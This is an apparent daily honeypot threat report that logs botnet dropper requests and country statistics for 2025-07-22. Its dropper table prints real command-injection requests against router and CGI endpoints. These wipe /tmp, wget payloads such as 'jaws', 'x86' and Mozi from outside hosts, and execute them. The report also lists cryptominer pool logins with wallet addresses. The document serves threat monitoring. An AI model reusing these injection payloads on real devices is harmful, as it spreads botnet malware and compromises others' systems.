Skip to main content
  1. Daily-Posts/

Report: 2025-07-22

·296 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-22
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 6 new requests that have never been observed before (these were added to the monitored request database.).

A total of 511 requests were recorded during the day, originating from 6 different countries, with a peak of 113 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
8.222.162.163GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.167.136GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /cgi-bin/shortcut_telnet.cgi?wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.gigatex.sh%7Csh%3B HTTP/1.1
45.153.34.79GET /shell?cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/x86;chmod+777+x86;./x86;cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/arm7;chmod+777+arm7;./arm7 HTTP/1.1
8.219.208.212GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.47.196.217GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.47.196.217:34359/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1091{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2244VA89LzxY3CcUKUtxTcrk6Zz1fS3tV6aGyJJmYY1o9iiUmyjmWDGTb2ekCFjPRqaSXWpf1AiDKnZ2JwTpZbq2c67Fsyh8m\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
1141{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x5ca06400e508b0177566d4d3dea0828a5d9b0473\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1251\x00\x0E8\xAFz\x8C\x22\xC0\xA4k3\x00\x00\x00\x00\x00
1891\x00\x0E\x08\x9B\x8F*n\x81\x1C6N\x00\x00\x00\x00\x00
2001\x00\x0E8\x9B\x8F*n\x81\x1C6N\x00\x00\x00\x00\x00
2221\x00\x0E8\xB7\xA4F\xF1v\x91\x09\x04\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0113GB
1107US
273NL
328FR
418DE
518CA
617JP
717BG
816PL
915ES
1013SG
1113SC
1212RO
139CN
146BE
156MU
165PT
175IN
183RU
193HK
203KZ
212IT
222ZA
231CH
241AR
251KR
261AE
271LT
281TR
291CO

Related

Report: 2025-07-21
·274 words
Repport Daily
Report: 2025-07-20
·346 words
Repport Daily
Report: 2025-07-19
·353 words
Repport Daily